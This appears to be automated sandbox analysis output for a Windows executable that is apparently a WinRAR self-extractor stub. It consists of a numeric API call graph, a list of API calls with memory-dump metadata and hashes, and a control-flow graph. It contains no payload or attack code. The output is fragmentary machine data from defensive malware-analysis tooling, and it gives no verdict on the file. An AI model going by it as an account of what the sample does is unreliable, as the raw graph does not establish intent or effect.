24539->24543 24545 5c03b 24540->24545 24541 5c18b 24546 5c194 EnableWindow 24541->24546 24547 5c19d 24541->24547 24542->24523 24550 5c017 SetDlgItemTextW 24543->24550 24558 5c04d 24545->24558 24584 5c072 24545->24584 24546->24547 24549 5c1ba 24547->24549 24765 412d3 GetDlgItem EnableWindow 24547->24765 24548 5beed 24552 4e617 53 API calls 24548->24552 24555 5c1e1 24549->24555 24569 5c1d9 SendMessageW 24549->24569 24550->24530 24551 5ba87 24556 5ba9e 24551->24556 24557 5ba90 GetLastError 24551->24557 24552->24477 24553 5c0cb 24561 5c73f 97 API calls 24553->24561 24555->24477 24570 4e617 53 API calls 24555->24570 24562 5bb11 24556->24562 24566 5bb20 24556->24566 24571 5baae GetTickCount 24556->24571 24557->24556 24763 59ed5 32 API calls 24558->24763 24559 5c1b0 24766 412d3 GetDlgItem EnableWindow 24559->24766 24560->24548 24564 4e617 53 API calls 24560->24564 24561->24579 24565 5bd56 24562->24565 24562->24566 24572 5bed0 24564->24572 24666 412f1 GetDlgItem ShowWindow 24565->24666 24574 5bcfb 24566->24574 24575 5bcf1 24566->24575 24576 5bb39 GetModuleFileNameW 24566->24576 24567 5c066 24567->24584 24569->24555 24570->24508 24578 44092 _swprintf 51 API calls 24571->24578 24580 44092 _swprintf 51 API calls 24572->24580 24573 5c169 24764 59ed5 32 API calls 24573->24764 24583 4e617 53 API calls 24574->24583 24575->24486 24575->24574 24757 4f28c 82 API calls 24576->24757 24586 5bac7 24578->24586 24579->24541 24579->24573 24587 4e617 53 API calls 24579->24587 24580->24548 24590 5bd05 24583->24590 24584->24553 24591 5c73f 97 API calls 24584->24591 24585 5bd66 24667 412f1 GetDlgItem ShowWindow 24585->24667 24658 4966e 24586->24658 24587->24579 24588 5c188 24588->24541 24589 5bb5f 24593 44092 _swprintf 51 API calls 24589->24593 24594 44092 _swprintf 51 API calls 24590->24594 24595 5c0a0 24591->24595 24598 5bb81 CreateFileMappingW 24593->24598 24599 5bd23 24594->24599 24595->24553 24600 5c0a9 DialogBoxParamW 24595->24600 24596 5bd70 24601 4e617 53 API calls 24596->24601 24603 5bbe3 GetCommandLineW 24598->24603 24635 5bc60 __InternalCxxFrameHandler 24598->24635 24613 4e617 53 API calls 24599->24613 24600->24486 24600->24553 24604 5bd7a SetDlgItemTextW 24601->24604 24602 5baed 24606 5baf4 GetLastError 24602->24606 24607 5baff 24602->24607 24608 5bbf4 24603->24608 24668 412f1 GetDlgItem ShowWindow 24604->24668 24606->24607 24611 4959a 80 API calls 24607->24611 24758 5b425 SHGetMalloc 24608->24758 24609 5bc6b ShellExecuteExW 24630 5bc88 24609->24630 24610 5bd8c SetDlgItemTextW GetDlgItem 24614 5bdc1 24610->24614 24615 5bda9 GetWindowLongW SetWindowLongW 24610->24615 24611->24562 24617 5bd3d 24613->24617 24669 5c73f 24614->24669 24615->24614 24616 5bc10 24759 5b425 SHGetMalloc 24616->24759 24621 5bc1c 24760 5b425 SHGetMalloc 24621->24760 24622 5bccb 24622->24575 24628 5bce1 UnmapViewOfFile CloseHandle 24622->24628 24623 5c73f 97 API calls 24625 5bddd 24623->24625 24694 5da52 24625->24694 24626 5bc28 24761 4f3fa 82 API calls 2 library calls 24626->24761 24628->24575 24630->24622 24633 5bcb7 Sleep 24630->24633 24632 5bc3f MapViewOfFile 24632->24635 24633->24622 24633->24630 24634 5c73f 97 API calls 24638 5be03 24634->24638 24635->24609 24636 5be2c 24762 412d3 GetDlgItem EnableWindow 24636->24762 24638->24636 24640 5c73f 97 API calls 24638->24640 24639->24486 24639->24509 24640->24636 24642 4131f 24641->24642 24643 41378 24641->24643 24644 41385 24642->24644 24767 4e2e8 62 API calls 2 library calls 24642->24767 24768 4e2c1 GetWindowLongW SetWindowLongW 24643->24768 24644->24477 24644->24478 24644->24479 24647 41341 24647->24644 24648 41354 GetDlgItem 24647->24648 24648->24644 24649 41364 24648->24649 24649->24644 24650 4136a SetWindowTextW 24649->24650 24650->24644 24652 4a0bb 24651->24652 24653 4a14c 24652->24653 24655 4a175 24652->24655 24769 4a2b2 24652->24769 24654 4a2b2 8 API calls 24653->24654 24653->24655 24654->24655 24655->24537 24655->24538 24657->24551 24659 49678 24658->24659 24660 496d5 CreateFileW 24659->24660 24661 496c9 24659->24661 24660->24661 24662 4971f 24661->24662 24663 4bb03 GetCurrentDirectoryW 24661->24663 24662->24602 24664 49704 24663->24664 24664->24662 24665 49708 CreateFileW 24664->24665 24665->24662 24666->24585 24667->24596 24668->24610 24670 5c749 __EH_prolog 24669->24670 24671 5bdcf 24670->24671 24672 5b314 ExpandEnvironmentStringsW 24670->24672 24671->24623 24678 5c780 _wcslen _wcsrchr 24672->24678 24674 5b314 ExpandEnvironmentStringsW 24674->24678 24675 5ca67 SetWindowTextW 24675->24678 24678->24671 24678->24674 24678->24675 24679 63e3e 22 API calls 24678->24679 24681 5c855 SetFileAttributesW 24678->24681 24686 5cc31 GetDlgItem SetWindowTextW SendMessageW 24678->24686 24689 5cc71 SendMessageW 24678->24689 24790 51fbb CompareStringW 24678->24790 24791 5a64d GetCurrentDirectoryW 24678->24791 24793 4a5d1 6 API calls 24678->24793 24794 4a55a FindClose 24678->24794 24795 5b48e 76 API calls 2 library calls 24678->24795 24679->24678 24682 5c90f GetFileAttributesW 24681->24682 24693 5c86f __cftof _wcslen 24681->24693 24682->24678 24685 5c921 DeleteFileW 24682->24685 24685->24678 24687 5c932 24685->24687 24686->24678 24688 44092 _swprintf 51 API calls 24687->24688 24690 5c952 GetFileAttributesW 24688->24690 24689->24678 24690->24687 24691 5c967 MoveFileW 24690->24691 24691->24678 24692 5c97f MoveFileExW 24691->24692 24692->24678 24693->24678 24693->24682 24792 4b991 51 API calls 2 library calls 24693->24792 24695 5da5c __EH_prolog 24694->24695 24796 50659 24695->24796 24697 5da8d 24800 45b3d 24697->24800 24699 5daab 24804 47b0d 24699->24804 24703 5dafe 24820 47b9e 24703->24820 24705 5bdee 24705->24634 24707 5d6a8 24706->24707 24708 5a5c6 4 API calls 24707->24708 24709 5d6ad 24708->24709 24710 5d6b5 GetWindow 24709->24710 24711 5bf15 24709->24711 24710->24711 24714 5d6d5 24710->24714 24711->24487 24711->24488 24712 5d6e2 GetClassNameW 25279 51fbb CompareStringW 24712->25279 24714->24711 24714->24712 24715 5d706 GetWindowLongW 24714->24715 24716 5d76a GetWindow 24714->24716 24715->24716 24717 5d716 SendMessageW 24715->24717 24716->24711 24716->24714 24717->24716 24718 5d72c GetObjectW 24717->24718 25280 5a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24718->25280 24721 5d743 25281 5a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24721->25281 25282 5a80c 8 API calls 24721->25282 24723 5d754 SendMessageW DeleteObject 24723->24716 24724->24499 24726 5abf1 24725->24726 24727 5abcc 24725->24727 24728 5abf6 SHAutoComplete 24726->24728 24729 5abff 24726->24729 25283 51fbb CompareStringW 24727->25283 24728->24729 24733 5b093 24729->24733 24731 5abdf 24731->24726 24732 5abe3 FindWindowExW 24731->24732 24732->24726 24734 5b09d __EH_prolog 24733->24734 24735 413dc 84 API calls 24734->24735 24736 5b0bf 24735->24736 25284 41fdc 24736->25284 24739 5b0d9 24741 41692 86 API calls 24739->24741 24740 5b0eb 24742 419af 128 API calls 24740->24742 24745 5b0e4 24741->24745 24743 5b10d __InternalCxxFrameHandler ___std_exception_copy 24742->24743 24744 41692 86 API calls 24743->24744 24744->24745 24745->24531 24745->24533 24746->24508 24748 5b568 5 API calls 24747->24748 24749 5d4e0 GetDlgItem 24748->24749 24750 5d536 SendMessageW SendMessageW 24749->24750 24751 5d502 24749->24751 24752 5d591 SendMessageW SendMessageW SendMessageW 24750->24752 24753 5d572 24750->24753 24754 5d50d ShowWindow SendMessageW SendMessageW 24751->24754 24755 5d5c4 SendMessageW 24752->24755 24756 5d5e7 SendMessageW 24752->24756 24753->24752 24754->24750 24755->24756 24756->24523 24757->24589 24758->24616 24759->24621 24760->24626 24761->24632 24762->24639 24763->24567 24764->24588 24765->24559 24766->24549 24767->24647 24768->24644 24770 4a2bf 24769->24770 24771 4a2e3 24770->24771 24772 4a2d6 CreateDirectoryW 24770->24772 24773 4a231 3 API calls 24771->24773 24772->24771 24774 4a316 24772->24774 24775 4a2e9 24773->24775 24777 4a325 24774->24777 24782 4a4ed 24774->24782 24776 4a329 GetLastError 24775->24776 24779 4bb03 GetCurrentDirectoryW 24775->24779 24776->24777 24777->24652 24780 4a2ff 24779->24780 24780->24776 24781 4a303 CreateDirectoryW 24780->24781 24781->24774 24781->24776 24783 5ec50 24782->24783 24784 4a4fa SetFileAttributesW 24783->24784 24785 4a510 24784->24785 24786 4a53d 24784->24786 24787 4bb03 GetCurrentDirectoryW 24785->24787 24786->24777 24788 4a524 24787->24788 24788->24786 24789 4a528 SetFileAttributesW 24788->24789 24789->24786 24790->24678 24791->24678 24792->24693 24793->24678 24794->24678 24795->24678 24797 50666 _wcslen 24796->24797 24824 417e9 24797->24824 24799 5067e 24799->24697 24801 50659 _wcslen 24800->24801 24802 417e9 78 API calls 24801->24802 24803 5067e 24802->24803 24803->24699 24805 47b17 __EH_prolog 24804->24805 24841 4ce40 24805->24841 24807 47b32 24808 5eb38 8 API calls 24807->24808 24809 47b5c 24808->24809 24847 54a76 24809->24847 24812 47c7d 24813 47c87 24812->24813 24815 47cf1 24813->24815 24876 4a56d 24813->24876 24817 47d50 24815->24817 24854 48284 24815->24854 24816 47d92 24816->24703 24817->24816 24882 4138b 74 API calls 24817->24882 24821 47bac 24820->24821 24823 47bb3 24820->24823 24822 52297 86 API calls 24821->24822 24822->24823 24826 417ff 24824->24826 24836 4185a __InternalCxxFrameHandler 24824->24836 24825 41828 24828 41887 24825->24828 24833 41847 ___std_exception_copy 24825->24833 24826->24825 24837 46c36 76 API calls __vswprintf_c_l 24826->24837 24830 63e3e 22 API calls 24828->24830 24829 4181e 24838 46ca7 75 API calls 24829->24838 24832 4188e 24830->24832 24832->24836 24840 46ca7 75 API calls 24832->24840 24833->24836 24839 46ca7 75 API calls 24833->24839 24836->24799 24837->24829 24838->24825 24839->24836 24840->24836 24842 4ce4a __EH_prolog 24841->24842 24843 5eb38 8 API calls 24842->24843 24844 4ce8d 24843->24844 24845 5eb38 8 API calls 24844->24845 24846 4ceb1 24845->24846 24846->24807 24848 54a80 __EH_prolog 24847->24848 24849 5eb38 8 API calls 24848->24849 24850 54a9c 24849->24850 24851 47b8b 24850->24851 24853 50e46 80 API calls 24850->24853 24851->24812 24853->24851 24855 4828e __EH_prolog 24854->24855 24883 413dc 24855->24883 24857 482aa 24858 482bb 24857->24858 25023 49f42 24857->25023 24861 482f2 24858->24861 24891 41a04 24858->24891 25019 41692 24861->25019 24864 482ee 24864->24861 24872 4a56d 7 API calls 24864->24872 24875 48389 24864->24875 25027 4c0c5 CompareStringW _wcslen 24864->25027 24868 483e8 24915 41f6d 24868->24915 24872->24864 24873 483f3 24873->24861 24919 43b2d 24873->24919 24931 4848e 24873->24931 24910 48430 24875->24910 24877 4a582 24876->24877 24878 4a5b0 24877->24878 25268 4a69b 24877->25268 24878->24813 24880 4a592 24880->24878 24881 4a597 FindClose 24880->24881 24881->24878 24882->24816 24884 413e1 __EH_prolog 24883->24884 24885 4ce40 8 API calls 24884->24885 24886 41419 24885->24886 24887 5eb38 8 API calls 24886->24887 24890 41474 __cftof 24886->24890 24888 41461 24887->24888 24889 4b505 84 API calls 24888->24889 24888->24890 24889->24890 24890->24857 24892 41a0e __EH_prolog 24891->24892 24904 41a61 24892->24904 24907 41b9b 24892->24907 25029 413ba 24892->25029 24894 41bc7 25032 4138b 74 API calls 24894->25032 24897 43b2d 101 API calls 24901 41c12 24897->24901 24898 41bd4 24898->24897 24898->24907 24899 41c5a 24903 41c8d 24899->24903 24899->24907 25033 4138b 74 API calls 24899->25033 24901->24899 24902 43b2d 101 API calls 24901->24902 24902->24901 24903->24907 24909 49e80 79 API calls 24903->24909 24904->24894 24904->24898 24904->24907 24905 43b2d 101 API calls 24906 41cde 24905->24906 24906->24905 24906->24907 24907->24864 24908 49e80 79 API calls 24908->24904 24909->24906 25051 4cf3d 24910->25051 24912 48440 25055 513d2 GetSystemTime SystemTimeToFileTime 24912->25055 24914 483a3 24914->24868 25028 51b66 72 API calls 24914->25028 24916 41f72 __EH_prolog 24915->24916 24918 41fa6 24916->24918 25060 419af 24916->25060 24918->24873 24920 43b3d 24919->24920 24921 43b39 24919->24921 24930 49e80 79 API calls 24920->24930 24921->24873 24922 43b4f 24923 43b78 24922->24923 24926 43b6a 24922->24926 25191 4286b 101 API calls 3 library calls 24923->25191 24925 43baa 24925->24873 24926->24925 25190 432f7 89 API calls 2 library calls 24926->25190 24928 43b76 24928->24925 25192 420d7 74 API calls 24928->25192 24930->24922 24932 48498 __EH_prolog 24931->24932 24935 484d5 24932->24935 24942 48513 24932->24942 25217 58c8d 103 API calls 24932->25217 24933 484f5 24936 4851c 24933->24936 24937 484fa 24933->24937 24935->24933 24938 4857a 24935->24938 24935->24942 24936->24942 25219 58c8d 103 API calls 24936->25219 24937->24942 25218 47a0d 152 API calls 24937->25218 24938->24942 25193 45d1a 24938->25193 24942->24873 24943 48605 24943->24942 25199 48167 24943->25199 24946 48797 24947 4a56d 7 API calls 24946->24947 24949 48802 24946->24949 24947->24949 24948 4d051 82 API calls 24956 4885d 24948->24956 25205 47c0d 24949->25205 24951 4898b 25222 42021 74 API calls 24951->25222 24952 48992 24953 48a5f 24952->24953 24958 489e1 24952->24958 24957 48ab6 24953->24957 24970 48a6a 24953->24970 24956->24942 24956->24948 24956->24951 24956->24952 25220 48117 84 API calls 24956->25220 25221 42021 74 API calls 24956->25221 24965 48a4c 24957->24965 25225 47fc0 97 API calls 24957->25225 24960 48b14 24958->24960 24962 4a231 3 API calls 24958->24962 24958->24965 24959 49105 24964 4959a 80 API calls 24959->24964 24960->24959 24979 48b82 24960->24979 25226 498bc 24960->25226 24961 48ab4 24966 4959a 80 API calls 24961->24966 24967 48a19 24962->24967 24964->24942 24965->24960 24965->24961 24966->24942 24967->24965 25223 492a3 97 API calls 24967->25223 24968 4ab1a 8 API calls 24971 48bd1 24968->24971 24970->24961 25224 47db2 101 API calls 24970->25224 24974 4ab1a 8 API calls 24971->24974 24992 48be7 24974->24992 24977 48b70 25230 46e98 77 API calls 24977->25230 24979->24968 24980 48cbc 24981 48e40 24980->24981 24982 48d18 24980->24982 24985 48e66 24981->24985 24986 48e52 24981->24986 25005 48d49 24981->25005 24983 48d8a 24982->24983 24984 48d28 24982->24984 24993 48167 19 API calls 24983->24993 24988 48d6e 24984->24988 24996 48d37 24984->24996 24987 53377 75 API calls 24985->24987 24989 49215 123 API calls 24986->24989 24990 48e7f 24987->24990 24988->25005 25233 477b8 111 API calls 24988->25233 24989->25005 25236 53020 123 API calls 24990->25236 24991 48c93 24991->24980 25231 49a3c 82 API calls 24991->25231 24992->24980 24992->24991 24999 4981a 79 API calls 24992->24999 24997 48dbd 24993->24997 25232 42021 74 API calls 24996->25232 25001 48df5 24997->25001 25002 48de6 24997->25002 24997->25005 24999->24991 25235 49155 93 API calls __EH_prolog 25001->25235 25234 47542 85 API calls 25002->25234 25009 48f85 25005->25009 25237 42021 74 API calls 25005->25237 25007 4a4ed 3 API calls 25010 490eb 25007->25010 25008 4903e 25212 49da2 25008->25212 25009->24959 25009->25008 25017 49090 25009->25017 25211 49f09 SetEndOfFile 25009->25211 25010->24959 25238 42021 74 API calls 25010->25238 25013 49085 25015 49620 77 API calls 25013->25015 25015->25017 25016 490fb 25239 46dcb 76 API calls 25016->25239 25017->24959 25017->25007 25021 416a4 25019->25021 25255 4cee1 25021->25255 25024 49f59 25023->25024 25025 49f63 25024->25025 25267 46d0c 78 API calls 25024->25267 25025->24858 25027->24864 25028->24868 25034 41732 25029->25034 25031 413d6 25031->24908 25032->24907 25033->24903 25035 41748 25034->25035 25046 417a0 __InternalCxxFrameHandler 25034->25046 25036 41771 25035->25036 25047 46c36 76 API calls __vswprintf_c_l 25035->25047 25037 417c7 25036->25037 25041 4178d ___std_exception_copy 25036->25041 25040 63e3e 22 API calls 25037->25040 25039 41767 25048 46ca7 75 API calls 25039->25048 25043 417ce 25040->25043 25041->25046 25049 46ca7 75 API calls 25041->25049 25043->25046 25050 46ca7 75 API calls 25043->25050 25046->25031 25047->25039 25048->25036 25049->25046 25050->25046 25052 4cf4d 25051->25052 25054 4cf54 25051->25054 25056 4981a 25052->25056 25054->24912 25055->24914 25057 49833 25056->25057 25059 49e80 79 API calls 25057->25059 25058 49865 25058->25054 25059->25058 25061 419bf 25060->25061 25063 419bb 25060->25063 25064 418f6 25061->25064 25063->24918 25065 41908 25064->25065 25066 41945 25064->25066 25067 43b2d 101 API calls 25065->25067 25072 43fa3 25066->25072 25070 41928 25067->25070 25070->25063 25076 43fac 25072->25076 25073 43b2d 101 API calls 25073->25076 25074 41966 25074->25070 25077 41e50 25074->25077 25076->25073 25076->25074 25089 50e08 25076->25089 25078 41e5a __EH_prolog 25077->25078 25097 43bba 25078->25097 25080 41e84 25081 41732 78 API calls 25080->25081 25084 41f0b 25080->25084 25082 41e9b 25081->25082 25125 418a9 78 API calls 25082->25125 25084->25070 25085 41eb3 25087 41ebf _wcslen 25085->25087 25126 51b84 MultiByteToWideChar 25085->25126 25127 418a9 78 API calls 25087->25127 25090 50e0f 25089->25090 25091 50e2a 25090->25091 25095 46c31 RaiseException CallUnexpected 25090->25095 25093 50e3b SetThreadExecutionState 25091->25093 25096 46c31 RaiseException CallUnexpected 25091->25096 25093->25076 25095->25091 25096->25093 25098 43bc4 __EH_prolog 25097->25098 25099 43bf6 25098->25099 25100 43bda 25098->25100 25102 43e51 25099->25102 25105 43c22 25099->25105 25153 4138b 74 API calls 25100->25153 25170 4138b 74 API calls 25102->25170 25104 43be5 25104->25080 25105->25104 25128 53377 25105->25128 25107 43ca3 25109 43d2e 25107->25109 25118 43c9a 25107->25118 25156 4d051 25107->25156 25108 43c9f 25108->25107 25155 420bd 78 API calls 25108->25155 25138 4ab1a 25109->25138 25111 43c71 25111->25107 25111->25108 25112 43c8f 25111->25112 25154 4138b 74 API calls 25112->25154 25114 43d41 25119 43dd7 25114->25119 25120 43dc7 25114->25120 25164 52297 25118->25164 25162 53020 123 API calls 25119->25162 25142 49215 25120->25142 25123 43dd5 25123->25118 25163 42021 74 API calls 25123->25163 25125->25085 25126->25087 25127->25084 25129 5338c 25128->25129 25131 53396 ___std_exception_copy 25128->25131 25171 46ca7 75 API calls 25129->25171 25132 534c6 25131->25132 25135 5341c 25131->25135 25137 53440 __cftof 25131->25137 25173 6238d RaiseException 25132->25173 25172 532aa 75 API calls 3 library calls 25135->25172 25136 534f2 25137->25111 25139 4ab28 25138->25139 25141 4ab32 25138->25141 25140 5eb38 8 API calls 25139->25140 25140->25141 25141->25114 25143 4921f __EH_prolog 25142->25143 25174 47c64 25143->25174 25146 413ba 78 API calls 25147 49231 25146->25147 25177 4d114 25147->25177 25150 4d114 118 API calls 25151 49243 25150->25151 25151->25150 25152 4928a 25151->25152 25186 4d300 97 API calls __InternalCxxFrameHandler 25151->25186 25152->25123 25153->25104 25154->25118 25155->25107 25157 4d084 25156->25157 25158 4d072 25156->25158 25188 4603a 82 API calls 25157->25188 25187 4603a 82 API calls 25158->25187 25161 4d07c 25161->25109 25162->25123 25163->25118 25165 522a1 25164->25165 25166 522ba 25165->25166 25169 522ce 25165->25169 25189 50eed 86 API calls 25166->25189 25168 522c1 25168->25169 25170->25104 25171->25131 25172->25137 25173->25136 25175 4b146 GetVersionExW 25174->25175 25176 47c69 25175->25176 25176->25146 25183 4d12a __InternalCxxFrameHandler 25177->25183 25178 4d29a 25179 4d2ce 25178->25179 25180 4d0cb 6 API calls 25178->25180 25181 50e08 SetThreadExecutionState RaiseException 25179->25181 25180->25179 25184 4d291 25181->25184 25182 58c8d 103 API calls 25182->25183 25183->25178 25183->25182 25183->25184 25185 4ac05 91 API calls 25183->25185 25184->25151 25185->25183 25186->25151 25187->25161 25188->25161 25189->25168 25190->24928 25191->24928 25192->24925 25194 45d2a 25193->25194 25240 45c4b 25194->25240 25197 45d5d 25198 45d95 25197->25198 25245 4b1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 25197->25245 25198->24943 25200 48186 25199->25200 25201 48232 25200->25201 25252 4be5e 19 API calls __InternalCxxFrameHandler 25200->25252 25251 51fac CharUpperW 25201->25251 25204 4823b 25204->24946 25206 47c22 25205->25206 25207 47c5a 25206->25207 25253 46e7a 74 API calls 25206->25253 25207->24956 25209 47c52 25254 4138b 74 API calls 25209->25254 25211->25008 25213 49db3 25212->25213 25215 49dc2 25212->25215 25214 49db9 FlushFileBuffers 25213->25214 25213->25215 25214->25215 25216 49e3f SetFileTime 25215->25216 25216->25013 25217->24935 25218->24942 25219->24942 25220->24956 25221->24956 25222->24952 25223->24965 25224->24961 25225->24965 25227 498c5 GetFileType 25226->25227 25228 48b5a 25226->25228 25227->25228 25228->24979 25229 42021 74 API calls 25228->25229 25229->24977 25230->24979 25231->24980 25232->25005 25233->25005 25234->25005 25235->25005 25236->25005 25237->25009 25238->25016 25239->24959 25246 45b48 25240->25246 25242 45c6c 25242->25197 25244 45b48 2 API calls 25244->25242 25245->25197 25247 45b52 25246->25247 25249 45c3a 25247->25249 25250 4b1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 25247->25250 25249->25242 25249->25244 25250->25247 25251->25204 25252->25201 25253->25209 25254->25207 25256 4cef2 25255->25256 25261 4a99e 25256->25261 25258 4cf24 25259 4a99e 86 API calls 25258->25259 25260 4cf2f 25259->25260 25262 4a9c1 25261->25262 25265 4a9d5 25261->25265 25266 50eed 86 API calls 25262->25266 25264 4a9c8 25264->25265 25265->25258 25266->25264 25267->25025 25269 4a6a8 25268->25269 25270 4a727 FindNextFileW 25269->25270 25271 4a6c1 FindFirstFileW 25269->25271 25272 4a732 GetLastError 25270->25272 25278 4a709 25270->25278 25273 4a6d0 25271->25273 25271->25278 25272->25278 25274 4bb03 GetCurrentDirectoryW 25273->25274 25275 4a6e0 25274->25275 25276 4a6e4 FindFirstFileW 25275->25276 25277 4a6fe GetLastError 25275->25277 25276->25277 25276->25278 25277->25278 25278->24880 25279->24714 25280->24721 25281->24721 25282->24723 25283->24731 25285 49f42 78 API calls 25284->25285 25286 41fe8 25285->25286 25287 42005 25286->25287 25288 41a04 101 API calls 25286->25288 25287->24739 25287->24740 25289 41ff5 25288->25289 25289->25287 25291 4138b 74 API calls 25289->25291 25291->25287 25292 413e1 84 API calls 2 library calls 25378 594e0 GetClientRect 25403 521e0 26 API calls std::bad_exception::bad_exception 25420 5f2e0 46 API calls __RTC_Initialize 25421 6bee0 GetCommandLineA GetCommandLineW 25404 4f1e8 FreeLibrary 25405 495f0 80 API calls 25406 5fd4f 9 API calls 2 library calls 25422 45ef0 82 API calls 25307 698f0 25315 6adaf 25307->25315 25311 6990c 25312 69919 25311->25312 25323 69920 11 API calls 25311->25323 25314 69904 25316 6ac98 __dosmaperr 5 API calls 25315->25316 25317 6add6 25316->25317 25318 6adee TlsAlloc 25317->25318 25321 6addf 25317->25321 25318->25321 25319 5fbbc CatchGuardHandler 5 API calls 25320 698fa 25319->25320 25320->25314 25322 69869 20 API calls 2 library calls 25320->25322 25321->25319 25322->25311 25323->25314 25325 6abf0 25328 6abfb 25325->25328 25326 6af0a 11 API calls 25326->25328 25327 6ac24 25331 6ac50 DeleteCriticalSection 25327->25331 25328->25326 25328->25327 25329 6ac20 25328->25329 25331->25329 25380 688f0 7 API calls ___scrt_uninitialize_crt 25381 62cfb 38 API calls 4 library calls

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00050863: GetModuleHandleW.KERNEL32(kernel32), ref: 0005087C
                                                                                                                      • Part of subcall function 00050863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0005088E
                                                                                                                      • Part of subcall function 00050863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 000508BF
                                                                                                                      • Part of subcall function 0005A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0005A655
                                                                                                                      • Part of subcall function 0005AC16: OleInitialize.OLE32(00000000), ref: 0005AC2F
                                                                                                                      • Part of subcall function 0005AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0005AC66
                                                                                                                      • Part of subcall function 0005AC16: SHGetMalloc.SHELL32(00088438), ref: 0005AC70
                                                                                                                    • GetCommandLineW.KERNEL32 ref: 0005DF5C
                                                                                                                    • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0005DF83
                                                                                                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0005DF94
                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0005DFCE
                                                                                                                      • Part of subcall function 0005DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0005DBF4
                                                                                                                      • Part of subcall function 0005DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0005DC30
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0005DFD7
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,0009EC90,00000800), ref: 0005DFF2
                                                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxname,0009EC90), ref: 0005DFFE
                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 0005E009
                                                                                                                    • _swprintf.LIBCMT ref: 0005E048
                                                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0005E05A
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0005E061
                                                                                                                    • LoadIconW.USER32(00000000,00000064), ref: 0005E078
                                                                                                                    • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0005E0C9
                                                                                                                    • Sleep.KERNEL32(?), ref: 0005E0F7
                                                                                                                    • DeleteObject.GDI32 ref: 0005E130
                                                                                                                    • DeleteObject.GDI32(?), ref: 0005E140
                                                                                                                    • CloseHandle.KERNEL32 ref: 0005E183
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                                                    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xz
                                                                                                                    • API String ID: 3049964643-764618974
                                                                                                                    • Opcode ID: 886c4933cd46d4443e6092e9ccda80ec94c214e4b500d2b7070aa938ad982f7e
                                                                                                                    • Instruction ID: 6d9d344fe96d97fc545fd44c2a8617ad25c4c350e5cb1f14ea0fe1aaecc3c5aa
                                                                                                                    • Opcode Fuzzy Hash: 886c4933cd46d4443e6092e9ccda80ec94c214e4b500d2b7070aa938ad982f7e
                                                                                                                    • Instruction Fuzzy Hash: 2E61C671904245AFF320AB74DC49FAB37ECFB45702F00442AFD8996192DBBC9948D766

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 812 5a6c2-5a6df FindResourceW 813 5a6e5-5a6f6 SizeofResource 812->813 814 5a7db 812->814 813->814 815 5a6fc-5a70b LoadResource 813->815 816 5a7dd-5a7e1 814->816 815->814 817 5a711-5a71c LockResource 815->817 817->814 818 5a722-5a737 GlobalAlloc 817->818 819 5a7d3-5a7d9 818->819 820 5a73d-5a746 GlobalLock 818->820 819->816 821 5a7cc-5a7cd GlobalFree 820->821 822 5a74c-5a76a call 60320 CreateStreamOnHGlobal 820->822 821->819 825 5a7c5-5a7c6 GlobalUnlock 822->825 826 5a76c-5a78e call 5a626 822->826 825->821 826->825 831 5a790-5a798 826->831 832 5a7b3-5a7c1 831->832 833 5a79a-5a7ae GdipCreateHBITMAPFromBitmap 831->833 832->825 833->832 834 5a7b0 833->834 834->832
                                                                                                                    APIs
